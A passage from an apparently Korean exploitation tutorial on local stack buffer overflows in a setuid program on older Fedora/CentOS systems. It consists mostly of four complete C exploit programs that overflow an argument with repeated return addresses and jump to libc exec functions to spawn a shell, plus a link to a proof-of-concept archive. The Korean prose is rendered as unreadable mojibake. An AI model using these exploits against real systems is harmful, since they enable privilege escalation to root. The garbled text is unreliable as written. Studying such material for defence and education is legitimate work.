½Ã¿Í µ¿ÀÏÇÏ´Ù. ÄÄÆÄÀÏ: gcc -o 0x82-x_execlp 0x82-x_execlp.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execlp.c */ int main() { char *environs[]={ "/bin/ls", /* environ0: /bin/ls */ "ls", /* environ1: ls */ "-al", /* environ2: -al */ 0}; char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */ "\x78\x29\x7a", /* execlp() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-6) execv() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execv.c ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â °ø°Ý ÄÚµå·Î½á, execv() µÎ ¹ø° ÀÎÀÚ¿¡ null code Æ÷ÀÎÅÍ°¡ ¾Æ´Ñ, null(0x00000000) code¸¦ Á÷Á¢ ³Ö¾î °ø°ÝÀ» ½ÃµµÇÑ´Ù. ÇÔ¼öÀÇ ÀÎÀÚ´Â ´Ü µÎ °³¸¸ ÇÊ¿ä·ÎÇϹǷÎ, ½±°Ô °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ´Ù. ÄÄÆÄÀÏ: gcc -o 0x82-x_execv 0x82-x_execv.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execv.c */ int main() { char *environs[]={ "./sh", /* environ0: ./sh */ 0}; /* ** execv()'s argument: ** -- ** execv("./sh",0x00000000); */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */ "\xd4\x22\x7a", /* execv() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-7) execvp() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execvp.c ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â °ø°Ý ÄÚµå·Î½á, execvp() µÎ ¹ø° ÀÎÀÚ¿¡ null code Æ÷ÀÎÅÍ°¡ ¾Æ´Ñ, null(0x00000000) code¸¦ Á÷Á¢ ³Ö¾î °ø°ÝÀ» ½ÃµµÇÑ´Ù. ÇÔ¼öÀÇ ÀÎÀÚ´Â ´Ü µÎ °³¸¸ ÇÊ¿ä·ÎÇϹǷÎ, ½±°Ô °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ´Ù. exploit method´Â execv() ÇÔ¼ö »ç¿ë ½Ã¿Í µ¿ÀÏÇÏ´Ù. ÄÄÆÄÀÏ: gcc -o 0x82-x_execvp 0x82-x_execvp.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execvp.c */ int main() { char *environs[]={ "./sh", /* environ0: ./sh */ 0}; /* ** execvp()'s argument: ** -- ** execvp("./sh",0x00000000); */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */ "\xa0\x25\x7a", /* execvp() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-8) execve() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execve.c ¾Õ¼­ ¿¹Á¦¿¡¼­ ¼Ò°³ÇÑ °ø°Ý ÄÚµå·Î½á, execve() µÎ ¹ø° ÀÎÀÚ¿Í ¼¼ ¹ø° ÀÎÀÚ¿¡ null code Æ÷ÀÎÅ͸¦ ³Ö´Â´Ù. ¹°·Ð, null code Æ÷ÀÎÅÍ°¡ ¾Æ´Ñ, null(0x00000000) code¸¦ Á÷Á¢ ³Ö¾îÁ־ °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ´Ù. ÄÄÆÄÀÏ: gcc -o 0x82-x_execve 0x82-x_execve.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execve.c */ int main() { char *environs[]={ "./sh", /* environ0: ./sh */ "\x00", /* environ1: 0x00000000 */ "\x00", /* environ2: 0x00000000 */ "\x00", /* environ3 */ "\x00", /* environ4 */ "\x00", /* environ5 */ 0}; /* ** execve()'s argument: ** -- ** execve("./sh",[null code pointer],[null code pointer]); */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08" /* ret code number: 38 */ "\xac\x21\x7a", /* execve() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ Àüü Äڵ带 ¾ò°íÀÚ ÇÑ´Ù¸é, ´ÙÀ½ Proof-of-Concept Äڵ带 ´Ù¿î·Îµå ¹Þ¾Æ ½ÃÇèÇغ¸±æ ¹Ù¶õ´Ù. http://x82.inetcop.org/h0me/papers/data/0x82-local_environ_bof.tgz (root ±ÇÇÑ¿¡¼­ ¾ÐÃàÀ» Ç®¸é, root ¼ÒÀ¯ÀÚÀÇ setuid°¡ ¼³Á¤µÇ¾î ÀÖÀ» °ÍÀÌ´Ù.) ±×·³, Áñ°Å¿î exploit µÇ±æ... :-} 8) ·¹ÆÛ·±½º - Fedora Core 3 based remote buffer overflow method (ÀÛ¼ºÀÚ: À¯µ¿ÈÆ) - Fedora Core 4,5,6 ³»¿¡¼­ local ½ºÅà ±â¹Ý overflow exploit ¹æ¹ý (ÀÛ¼ºÀÚ: À¯µ¿ÈÆ) - White Box Enterprise 4, CentOS 4.2 system ³»¿¡¼­ local ½ºÅà ±â¹Ý overflow exploit (ÀÛ¼ºÀÚ: À¯µ¿ÈÆ)